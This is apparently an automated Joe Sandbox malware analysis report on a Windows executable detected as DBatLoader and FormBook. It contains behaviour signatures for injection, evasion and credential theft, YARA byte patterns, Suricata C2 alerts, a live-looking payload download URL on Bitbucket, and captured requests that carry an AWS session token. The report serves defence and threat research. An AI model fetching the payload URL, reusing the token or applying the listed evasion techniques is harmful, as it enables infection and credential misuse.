Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z10982283782.exe

Overview

General Information

Sample name:z10982283782.exe
Analysis ID:1539808
MD5:3138edfdc34f754c5f31088f00ae239d
SHA1:2251e5474cc5af3619f99ee9c6c0042c10b089a6
SHA256:a1f257ec69c19785880ec7a051e3a4030a2edf055fd2e00f7f7f58c43d563cac
Tags:exeuser-Porcupine
Infos:

Detection

DBatLoader, FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected FormBook
AI detected suspicious sample
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates a thread in another existing process (thread injection)
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • z10982283782.exe (PID: 6452 cmdline: "C:\Users\user\Desktop\z10982283782.exe" MD5: 3138EDFDC34F754C5F31088F00AE239D)
    • colorcpl.exe (PID: 4516 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
      • ObMmiCfBgqmt.exe (PID: 1312 cmdline: "C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • takeown.exe (PID: 3964 cmdline: "C:\Windows\SysWOW64\takeown.exe" MD5: A9AB2877AE82A53F5A387B045BF326A4)
          • ObMmiCfBgqmt.exe (PID: 484 cmdline: "C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1732 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://bitbucket.org/akeem4u/canter/downloads/233_Ltspwqrtysw"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.1523878243.0000000004A20000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.1523878243.0000000004A20000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2c150:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1423f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000E.00000002.2494174819.0000000004C40000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000E.00000002.2494174819.0000000004C40000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2e2ea:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x163d9:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        10.2.colorcpl.exe.65f0000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          10.2.colorcpl.exe.65f0000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e2d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x163c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          10.2.colorcpl.exe.65f0000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            10.2.colorcpl.exe.65f0000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f0d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x171c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            0.2.z10982283782.exe.2a90000.0.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-23T07:02:49.845749+020028554651A Network Trojan was detected192.168.2.7498783.33.130.19080TCP
              2024-10-23T07:03:21.450730+020028554651A Network Trojan was detected192.168.2.75965174.48.31.12380TCP
              2024-10-23T07:03:35.010762+020028554651A Network Trojan was detected192.168.2.759655161.97.168.24580TCP
              2024-10-23T07:03:50.377967+020028554651A Network Trojan was detected192.168.2.759659154.23.184.24080TCP
              2024-10-23T07:04:04.448344+020028554651A Network Trojan was detected192.168.2.759663194.58.112.17480TCP
              2024-10-23T07:04:18.810436+020028554651A Network Trojan was detected192.168.2.7596673.33.130.19080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-23T07:03:06.830909+020028554641A Network Trojan was detected192.168.2.75963374.48.31.12380TCP
              2024-10-23T07:03:09.378022+020028554641A Network Trojan was detected192.168.2.75964474.48.31.12380TCP
              2024-10-23T07:03:11.940326+020028554641A Network Trojan was detected192.168.2.75965074.48.31.12380TCP
              2024-10-23T07:03:27.366251+020028554641A Network Trojan was detected192.168.2.759652161.97.168.24580TCP
              2024-10-23T07:03:29.881280+020028554641A Network Trojan was detected192.168.2.759653161.97.168.24580TCP
              2024-10-23T07:03:32.440366+020028554641A Network Trojan was detected192.168.2.759654161.97.168.24580TCP
              2024-10-23T07:03:41.737445+020028554641A Network Trojan was detected192.168.2.759656154.23.184.24080TCP
              2024-10-23T07:03:44.799857+020028554641A Network Trojan was detected192.168.2.759657154.23.184.24080TCP
              2024-10-23T07:03:47.347468+020028554641A Network Trojan was detected192.168.2.759658154.23.184.24080TCP
              2024-10-23T07:03:56.709964+020028554641A Network Trojan was detected192.168.2.759660194.58.112.17480TCP
              2024-10-23T07:03:59.356558+020028554641A Network Trojan was detected192.168.2.759661194.58.112.17480TCP
              2024-10-23T07:04:01.912056+020028554641A Network Trojan was detected192.168.2.759662194.58.112.17480TCP
              2024-10-23T07:04:10.480043+020028554641A Network Trojan was detected192.168.2.7596643.33.130.19080TCP
              2024-10-23T07:04:13.017875+020028554641A Network Trojan was detected192.168.2.7596653.33.130.19080TCP
              2024-10-23T07:04:16.229747+020028554641A Network Trojan was detected192.168.2.7596663.33.130.19080TCP
              2024-10-23T07:04:25.362597+020028554641A Network Trojan was detected192.168.2.759668203.90.227.8880TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: z10982283782.exeAvira: detected
              Found malware configuration
              Source: z10982283782.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://bitbucket.org/akeem4u/canter/downloads/233_Ltspwqrtysw"]}
              Multi AV Scanner detection for submitted file
              Source: z10982283782.exeReversingLabs: Detection: 52%
              Source: z10982283782.exeVirustotal: Detection: 54%Perma Link
              Yara detected FormBook
              Source: Yara matchFile source: 10.2.colorcpl.exe.65f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.colorcpl.exe.65f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000002.1523878243.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2494174819.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2488106328.0000000000670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2491687518.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2491841213.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2492246864.0000000005060000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1539377405.0000000025240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: z10982283782.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.7:49700 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 3.5.3.65:443 -> 192.168.2.7:49701 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.7:49703 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 3.5.3.65:443 -> 192.168.2.7:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.7:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 54.231.236.129:443 -> 192.168.2.7:49713 version: TLS 1.2
              Source: Binary string: colorcpl.pdbGCTL source: takeown.exe, 0000000D.00000002.2488818800.000000000093E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000002.2492977299.000000000364C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000280C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.1830307466.0000000028E9C000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: colorcpl.pdb source: takeown.exe, 0000000D.00000002.2488818800.000000000093E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000002.2492977299.000000000364C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000280C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.1830307466.0000000028E9C000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: takeown.pdbGCTL source: colorcpl.exe, 0000000A.00000003.1492463807.00000000028A1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1523639255.00000000028A0000.00000004.00000020.00020000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000003.1462420383.0000000000BEB000.00000004.00000020.00020000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000002.2490451481.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000002.2490451481.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ObMmiCfBgqmt.exe, 0000000C.00000002.2488106778.00000000004BE000.00000002.00000001.01000000.00000008.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2489652502.00000000004BE000.00000002.00000001.01000000.00000008.sdmp
              Source: Binary string: easinvoker.pdb source: z10982283782.exe, z10982283782.exe, 00000000.00000003.1235919667.000000007FAC0000.00000004.00001000.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1236633827.000000007F8B0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: colorcpl.exe, 0000000A.00000003.1431854432.0000000022542000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1538249660.000000002288E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000003.1430019067.00000000048CE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000D.00000002.2492291107.0000000003020000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000D.00000003.1531374042.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000003.1523711337.0000000000A3D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000002.2492291107.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: takeown.pdb source: colorcpl.exe, 0000000A.00000003.1492463807.00000000028A1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1523639255.00000000028A0000.00000004.00000020.00020000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000003.1462420383.0000000000BEB000.00000004.00000020.00020000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000002.2490451481.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000002.2490451481.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: colorcpl.exe, colorcpl.exe, 0000000A.00000003.1431854432.0000000022542000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1538249660.000000002288E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000003.1430019067.00000000048CE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, takeown.exe, 0000000D.00000002.2492291107.0000000003020000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000D.00000003.1531374042.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000003.1523711337.0000000000A3D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000002.2492291107.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdbGCTL source: z10982283782.exe, 00000000.00000002.1351975173.00000000028CF000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1235919667.000000007FAC0000.00000004.00001000.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1236423933.00000000028D8000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1236633827.000000007F8B0000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02A95908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02A95908
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0068C5F0 FindFirstFileW,FindNextFileW,FindClose,13_2_0068C5F0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop edi10_2_06608934
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 4x nop then xor eax, eax13_2_00679B80
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 4x nop then pop edi13_2_006859B1
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 4x nop then mov ebx, 00000004h13_2_00CE04E8

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49878 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:59651 -> 74.48.31.123:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59660 -> 194.58.112.174:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59653 -> 161.97.168.245:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59633 -> 74.48.31.123:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59665 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59658 -> 154.23.184.240:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59650 -> 74.48.31.123:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59664 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:59667 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59661 -> 194.58.112.174:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59668 -> 203.90.227.88:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:59655 -> 161.97.168.245:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59656 -> 154.23.184.240:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59652 -> 161.97.168.245:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59654 -> 161.97.168.245:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59657 -> 154.23.184.240:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59666 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:59659 -> 154.23.184.240:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59644 -> 74.48.31.123:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:59662 -> 194.58.112.174:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:59663 -> 194.58.112.174:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: https://bitbucket.org/akeem4u/canter/downloads/233_Ltspwqrtysw
              Performs DNS queries to domains with low reputation
              Source: DNS query: www.joshcharlesfitness.xyz
              Source: DNS query: www.98080753.xyz
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AAE4B8 InternetCheckConnectionA,0_2_02AAE4B8
              Source: Joe Sandbox ViewIP Address: 185.166.143.48 185.166.143.48
              Source: Joe Sandbox ViewIP Address: 154.23.184.240 154.23.184.240
              Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
              Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
              Source: Joe Sandbox ViewASN Name: TELUS-3CA TELUS-3CA
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /akeem4u/canter/downloads/233_Ltspwqrtysw HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
              Source: global trafficHTTP traffic detected: GET /1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/a122b37b-2be1-4956-a228-3e44b96626b8/233_Ltspwqrtysw?response-content-disposition=attachment%3B%20filename%3D%22233_Ltspwqrtysw%22&AWSAccessKeyId=ASIA6KOSE3BNA3TNBD6S&Signature=bquajkbDUnHiY6Qk9cEyy3Ji0xM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEE0aCXVzLWVhc3QtMSJIMEYCIQDWLdnMpGGZVnfuf5mZ7tkLhGS%2BHN%2Fi5hrbwc5K5HeekAIhALFcc1ROzTR8B4kcaA2oVW3sq0zTC7bxDYRYDuyXyj6sKrACCLb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgyNe%2FRStUblqwXyTbkqhAK8BQ1NlXfF77BQxUe%2BLDGJ72hzvISSyyG1nPahXGTPb9H%2F4F2%2F5GlsBuXRyGcOQkj4ERRXbeHiahdKc%2BywbR6YEWoYOH14NAUuJivTj9fBN6WDk7UmQ8nnk5IxunnOohsVHIhsiRtMzjGYE3m%2BT3Nv%2B2LBuAC5kTgwrpgGcGd3z79%2FubqvQWKpCPk5OQo1tvOyZDdGiaMdoJrU%2F%2B%2F6PyCU39h28LMR4%2BdAAh6%2FYzNlkOlxzs7Ih0fOSFaTs1BSOSRuTvP9GixHrOn3THgqHyMm8F1oMbov2tlWw%2BCDNj5ns8S8xb%2BGRMfWJz69PjosPmJKRQvcpZYEVJ%2Fuao%2BBg6rxNrk1bzCkhuK4BjqcAeGCMiJnZekyMuhm2XJ%2FmPZHGuv1mMGkMdY36AKfCoyDFZlLRnUelBbsByQxcf9NuZCZIj5sRzg6N9aafMqZIWX0TejNIhed6dqnVS8HwylTQKvAyrfpMWEXQYcoRuCgC5HI%2BmoxQQqA%2FJoPRSnjgCdSSRSG6OGZM7%2Bk14Fj0UPjRL0yvo%2FNoM0PqoD64CRp88RIYyjGI8Iyik85Wg%3D%3D&Expires=1729661485 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
              Source: global trafficHTTP traffic detected: GET /akeem4u/canter/downloads/233_Ltspwqrtysw HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
              Source: global trafficHTTP traffic detected: GET /1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/a122b37b-2be1-4956-a228-3e44b96626b8/233_Ltspwqrtysw?response-content-disposition=attachment%3B%20filename%3D%22233_Ltspwqrtysw%22&AWSAccessKeyId=ASIA6KOSE3BNA3TNBD6S&Signature=bquajkbDUnHiY6Qk9cEyy3Ji0xM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEE0aCXVzLWVhc3QtMSJIMEYCIQDWLdnMpGGZVnfuf5mZ7tkLhGS%2BHN%2Fi5hrbwc5K5HeekAIhALFcc1ROzTR8B4kcaA2oVW3sq0zTC7bxDYRYDuyXyj6sKrACCLb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgyNe%2FRStUblqwXyTbkqhAK8BQ1NlXfF77BQxUe%2BLDGJ72hzvISSyyG1nPahXGTPb9H%2F4F2%2F5GlsBuXRyGcOQkj4ERRXbeHiahdKc%2BywbR6YEWoYOH14NAUuJivTj9fBN6WDk7UmQ8nnk5IxunnOohsVHIhsiRtMzjGYE3m%2BT3Nv%2B2LBuAC5kTgwrpgGcGd3z79%2FubqvQWKpCPk5OQo1tvOyZDdGiaMdoJrU%2F%2B%2F6PyCU39h28LMR4%2BdAAh6%2FYzNlkOlxzs7Ih0fOSFaTs1BSOSRuTvP9GixHrOn3THgqHyMm8F1oMbov2tlWw%2BCDNj5ns8S8xb%2BGRMfWJz69PjosPmJKRQvcpZYEVJ%2Fuao%2BBg6rxNrk1bzCkhuK4BjqcAeGCMiJnZekyMuhm2XJ%2FmPZHGuv1mMGkMdY36AKfCoyDFZlLRnUelBbsByQxcf9NuZCZIj5sRzg6N9aafMqZIWX0TejNIhed6dqnVS8HwylTQKvAyrfpMWEXQYcoRuCgC5HI%2BmoxQQqA%2FJoPRSnjgCdSSRSG6OGZM7%2Bk14Fj0UPjRL0yvo%2FNoM0PqoD64CRp88RIYyjGI8Iyik85Wg%3D%3D&Expires=1729661485 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
              Source: global trafficHTTP traffic detected: GET /akeem4u/canter/downloads/233_Ltspwqrtysw HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
              Source: global trafficHTTP traffic detected: GET /1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/a122b37b-2be1-4956-a228-3e44b96626b8/233_Ltspwqrtysw?response-content-disposition=attachment%3B%20filename%3D%22233_Ltspwqrtysw%22&AWSAccessKeyId=ASIA6KOSE3BNA3TNBD6S&Signature=bquajkbDUnHiY6Qk9cEyy3Ji0xM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEE0aCXVzLWVhc3QtMSJIMEYCIQDWLdnMpGGZVnfuf5mZ7tkLhGS%2BHN%2Fi5hrbwc5K5HeekAIhALFcc1ROzTR8B4kcaA2oVW3sq0zTC7bxDYRYDuyXyj6sKrACCLb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgyNe%2FRStUblqwXyTbkqhAK8BQ1NlXfF77BQxUe%2BLDGJ72hzvISSyyG1nPahXGTPb9H%2F4F2%2F5GlsBuXRyGcOQkj4ERRXbeHiahdKc%2BywbR6YEWoYOH14NAUuJivTj9fBN6WDk7UmQ8nnk5IxunnOohsVHIhsiRtMzjGYE3m%2BT3Nv%2B2LBuAC5kTgwrpgGcGd3z79%2FubqvQWKpCPk5OQo1tvOyZDdGiaMdoJrU%2F%2B%2F6PyCU39h28LMR4%2BdAAh6%2FYzNlkOlxzs7Ih0fOSFaTs1BSOSRuTvP9GixHrOn3THgqHyMm8F1oMbov2tlWw%2BCDNj5ns8S8xb%2BGRMfWJz69PjosPmJKRQvcpZYEVJ%2Fuao%2BBg6rxNrk1bzCkhuK4BjqcAeGCMiJnZekyMuhm2XJ%2FmPZHGuv1mMGkMdY36AKfCoyDFZlLRnU